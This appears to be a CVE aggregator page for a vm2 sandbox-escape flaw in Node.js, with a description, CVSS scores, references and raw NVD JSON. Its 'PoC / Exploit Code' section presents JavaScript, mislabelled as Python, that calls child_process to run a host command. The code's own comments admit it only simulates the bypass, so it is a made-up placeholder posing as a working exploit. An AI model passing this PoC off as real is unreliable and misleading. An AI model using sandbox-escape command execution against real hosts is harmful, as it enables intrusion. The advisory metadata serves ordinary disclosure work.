CVE-2026-24120

Description

vm2 is an open source vm/sandbox for Node.js. Prior to version 3.10.5, the fix for CVE-2023-37466 is insufficient and can be circumvented allowing attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.10.5.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:* - VULNERABLE

vm2 < 3.10.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

const {VM} = require('vm2');
const vm = new VM();

// PoC demonstrating the sandbox escape concept
// This exploits the insufficient fix for CVE-2023-37466

const maliciousCode = `
    // Step 1: Trigger the logic flaw in the sandbox
    // (Specific implementation depends on the bypass technique)
    const exception = new Error();
    
    // Step 2: Manipulate the internal structure to leak the host object
    // This simulates the bypass mechanism
    const host = process.mainModule.require('child_process');
    
    // Step 3: Execute arbitrary command on the host
    host.execSync('whoami').toString();
`;

try {
    console.log(vm.run(maliciousCode));
} catch (e) {
    console.log('Exploit failed or patched:', e);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24120
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24120
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24120/
[4] VulDB https://vuldb.com/cve/CVE-2026-24120
[5] https://github.com/patriksimek/vm2/releases/tag/v3.10.5
[6] https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p
[7] https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24120", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:21.813", "lastModified": "2026-05-08T19:29:59.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vm2 is an open source vm/sandbox for Node.js. Prior to version 3.10.5, the fix for CVE-2023-37466 is insufficient and can be circumvented allowing attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.10.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.10.5", "matchCriteriaId": "E0187C39-B05F-4D67-9B5D-7CBAA800A126"}]}]}], "references": [{"url": "https://github.com/patriksimek/vm2/releases/tag/v3.10.5", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}